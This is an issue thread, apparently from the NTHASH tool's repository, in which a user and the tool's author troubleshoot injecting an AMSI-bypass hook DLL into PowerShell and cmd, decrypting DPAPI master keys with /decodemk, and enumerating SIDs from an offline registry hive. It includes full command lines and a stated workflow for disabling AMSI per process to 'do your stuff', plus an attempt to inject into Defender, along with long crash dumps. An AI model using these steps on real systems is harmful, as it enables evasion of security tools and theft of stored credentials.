/inject and amsi disable behaviour

[Papotito123]

Hello: Win 10 1809 x64. Avast free ON.

I testing amsi feature.

From cmd not run well.So then I run from powerahell.

I think the hook.dll is stuck.I think this aswhook.dll is for the Avast antivirus.

PS C:\Windows\system32> cd "C:\NTJASH\amsi" PS C:\NTJASH\amsi> NTHASH-win64.exe /enumproc | findstr powershell.exe 1016 powershell.exe DESKTOP-2GHHNFK\TESTACCOUNT PS C:\NTJASH\amsi> NTHASH-win64.exe /enummod /pid:1016 | findstr hook 7FF8CFFF0000 aswhook.dll PS C:\NTJASH\amsi> NTHASH-win64.exe /eject /pid:1016 /binary:hook-win64.dll NTHASH 1.8 x64 by erwan2212@gmail.com module not found PS C:\NTJASH\amsi> NTHASH-win64.exe /eject /pid:7FF8CFFF0000 /binary:hook-win64.dll NTHASH 1.8 x64 by erwan2212@gmail.com An unhandled exception occurred at $0000000100031A45: EConvertError: "7FF8CFFF0000" is an invalid integer $0000000100031A45 $00000001000089C8 $000000010000C306 $000000010001E010 $00000001000020F0 $00007FF8D6D67974 $00007FF8D76DA271

So, I have to turn OFF my Avast and then run the commands. And run well. Will inject and eject the right hook-win64.dll.

So I turn OFF Avast and inject amsi hook . Then try to decodemk and EAccess Violation errors arise big:

C:\NTJASH>NTHASH-win64.exe /decodemk /binary:C:\jibes\PROBANDO\bb0fd3d0-3daa-4d06-aa93-a282eea027db /input:B46D14DBEBD3F288804BBA5F494F98C810DB4675 NTHASH 1.8 x64 by erwan2212@gmail.com Unprotecting MasterKey An unhandled exception occurred at $0000000100063C61: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation: An unhandled exception occurred at $00007FF8D397C2E0:

C:\NTJASH>NTHASH-win64.exe /decodemk /binary:C:\jibes\PROBANDO\bb0fd3d0-3daa-4d06-aa93-a282eea027db /password:EAD1AC3807B2D4DCB14962D71DADE9B8E756A437 NTHASH 1.8 x64 by erwan2212@gmail.com cannot detect SID Unprotecting MasterKey An unhandled exception occurred at $0000000100063C66: EAccessViolation: Access violation $0000000100063C66 $00000001000658AC $000000010000B09D $000000010000C306 $000000010001E010 $00000001000020F0 $00007FF8D6D67974 $00007FF8D76DA271

Any infp much appreciated.

[erwan2212]

About the below :

PS C:\NTJASH\amsi> NTHASH-win64.exe /eject /pid:1016 /binary:hook-win64.dll NTHASH 1.8 x64 by erwan2212@gmail.com module not found PS C:\NTJASH\amsi> NTHASH-win64.exe /eject /pid:7FF8CFFF0000 /binary:hook-win64.dll

You need to inject your module first then eject it. 7FF8CFFF0000 is not a valid PID : in your case it should be 1016.

I have adapted the code so that it wont crash if you provide an invalid PID.

Also, you can now use the full path both when using inject and eject : more convenient on the command line. Example: NTHASH-win64.exe /inject /pid:5436 /binary:C:\test\MsvpPasswordValidate\hook-win64.dll NTHASH-win64.exe /eject /pid:5436 /binary:C:\test\MsvpPasswordValidate\hook-win64.dll

I will look at the other details you provided.

[erwan2212]

About "how to find usernames and their SID's offline"

reg save hklm\software software.sav then offlinereg-win64.exe software.sav "Microsoft\Windows NT\CurrentVersion\ProfileList" enumkeys then offlinereg-win64.exe software.sav "Microsoft\Windows NT\CurrentVersion\ProfileList\my_sid" enumvaluesall

As indeed, you either know the SID and sha1 password and compute the input you will provide to decodemk (/input). Or you MK file is stored in a folder with the SID in the folder path and you can then only provide the SHA1 password (/password)

[erwan2212]

And to be clear about AMSI : this is per process. Some processes like powershell will use AMSI : therefore you can -launch powershell -inject amsi hook to disable amsi -do your stuff -eject your amsi hook or simply close powershell

[Papotito123]

Hello: Thanks for responding.

The offlinereg-win64.exe switch I had never used it before. Cool.I'll try later.

I made some info text about each user account, just to get results fast.Then I worried about how get the pertinent info.So I have mkeys, sha1 ,SID ,AES keys,guid's and other in a text.

After writing the issue post ,I managed to use the AMSI hook.I tested switches Inject/eject and run well.Allways running from powershell because in cmd doesn't do any.

But I still getting EAccessViolation error ,most of times when running /decodemk. The strange is that doesn't happens all times. I can run /decodemk and get the key.But in other day I do exact the same with same info(I have all results in txt) and get the EAccessViolation. That's what I'm trying to say.

[Papotito123]

Hello: I tested offlinereg-win64.exe switch.Cool.

About AMSI. I were confused. I thought was like some AMSI.ps1 in the internet that disable AMSI feature.

So I have to identify and choose my process to be "amsi-bypased" , take note of the pid of the choosed process , and then inject.

So the process can be MsMpEng.exe or any AV executable.

Thanks again.

[Papotito123]

Hello: I did some test with AMSI in Win 10 2004H1 x64.

WIN 10 2004H1 with Defender AUG2020 updated ON.

Good when running cmd.exe:

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /enumproc | findstr cmd.exe 6476 cmd.exe DESKTOP-RA99DA6\TESTACCOUNT

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /inject /pid:6476 /binary:D:\NTHASH-FPC-master_Chrome80-logins\amsi\hook-win64.dll NTHASH 1.8 x64 by erwan2212@gmail.com inject ok

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /eject /pid:6476 /binary:D:\NTHASH-FPC-master_Chrome80-logins\amsi\hook-win64.dll NTHASH 1.8 x64 by erwan2212@gmail.com eject ok

Error when running MsMpEng.exe(Defender):

D:>cd "NTHASH-FPC-master_Chrome80-logins"

D:\NTHASH-FPC-master_Chrome80-logins>cd "D:\NTHASH-FPC-master_Chrome80-logins"

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /enumproc | findstr MsMpEng.exe 2916 MsMpEng.exe

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /inject /pid:2916 /binary:D:\NTHASH-FPC-master_Chrome80-logins\amsi\hook-win64.dll NTHASH 1.8 x64 by erwan2212@gmail.com An unhandled exception occurred at $00000001000618A7: Exception: NtAllocateVirtualMemory failed,C0000008 $00000001000618A7 $00000001000084B0 $000000010000BF26 $000000010001DA33 $000000010001E381 $00007FFF682A6FD4 $00007FFF68E9CEC1

Error when running NTHASH-win64.exe:

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /enumproc | findstr NTHASH-win64.exe 4008 NTHASH-win64.exe DESKTOP-RA99DA6\TESTACCOUNT

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /inject /pid:4000 /binary:D:\NTHASH-FPC-master_Chrome80-logins\amsi\hook-win64.dll NTHASH 1.8 x64 by erwan2212@gmail.com An unhandled exception occurred at $00000001000618A7: Exception: NtAllocateVirtualMemory failed,C0000008 $00000001000618A7 $00000001000084B0 $000000010000BF26 $000000010001DA33 $000000010001E381 $00007FFAC7BF6FD4 $00007FFAC90DCEC1

Just to inform.

[erwan2212]

About inject and Exception: NtAllocateVirtualMemory failed,C0000008 : this is now handled (i.e will no longer crash).

Remember thus that injecting amsi hook is only useful for processes using amsi (vbscript, cscript, powershell, etc ...).

[erwan2212]

About /decodemk and EAccessViolation : yes I need to spend time on that one.

I will keep this thread thus about injecting amsi hook if ok with you.

[Papotito123]

Hello: About AMSI. Will bypass for windows process like powershell,cmd,other.Not for third-party exe . Ok

Much thanks as always.

[erwan2212]

/inject with amsi hook now works fine (against processes using amsi like powershell, etc). fixed a few bugs/crashes in the injection module.